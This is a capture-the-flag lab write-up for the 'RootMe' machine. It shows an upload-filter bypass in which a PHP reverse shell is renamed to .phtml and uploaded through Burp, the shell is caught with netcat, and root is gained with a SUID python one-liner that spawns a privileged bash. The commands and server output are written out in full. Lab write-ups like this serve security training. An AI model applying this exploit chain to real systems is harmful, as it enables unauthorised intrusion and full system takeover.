Skip to main content

RootMe

BurpSuite

  • Request From: [IP:80/panel]

There is a Server Side Filtering which Prevents us from Uploading specific File Extensions. We can use BURP:Intruder to FUZZ php-reverse-shell.[EXTENSION_TO_FUZZ] Extension to Find which one can be Uploaded.

POST /panel/ HTTP/1.1
Host: 10.10.126.254
Referer: http://10.10.126.254/panel/
Cookie: PHPSESSID=a2124oo7f1hp7un7b5hlvrn2ep

Content-Disposition: form-data; name="fileUpload"; filename="php-reverse-shell.php"
Content-Type: application/x-php

The Extension php-reverse-shell.[phtml] is not Blacklisted.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="../css/panel.css">
    <script src=../"js/maquina_de_escrever.js"></script>
    <title>HackIT - Home</title>
</head>
<body>
    <div class="first">
        <div class="main-div">
            <form action="" method="POST" enctype="multipart/form-data">
                <p>Select a file to upload:</p>
                <input type="file" name="fileUpload" class="fileUpload">
                <input type="submit" value="Upload" name="submit">
                <p class='success'>O arquivo foi upado com sucesso!</p><a href='../uploads/php-reverse-shell.phtml'>Veja!</a>            </form>
        </div>
    </div>
</body>
</html>

  • Translation
┌──────────────────────────────────┐    ┌──────────────────────────────────────────┐
| O arquivo foi upado com sucesso! | -► | The file has been successfully uploaded! |
└──────────────────────────────────┘    └──────────────────────────────────────────┘
  • The Reverse Shell got Successfully Uploaded to: [IP:80/uploads]
   [ICO]             Name            Last modified   Size Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[PARENTDIR] Parent Directory                            -  
[ ]         php-reverse-shell.phtml 2022-10-07 07:47 5.4K  
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Privilege Escalation

  • We can catch the Reverse Shell Using netcat 
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The /usr/bin/python Binary has the SUID Bit Set.
www-data@rootme /$ find / -type f -perm -04000 -ls 2>/dev/null
   ...
   266770  3580 -rwsr-sr-x   1 root    root     3665768 Aug  4  2020 /usr/bin/python
   ...

  • Using Python to Escalate Privileges.
www-data@rootme /$ /usr/bin/python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@rootme /$ whoami
root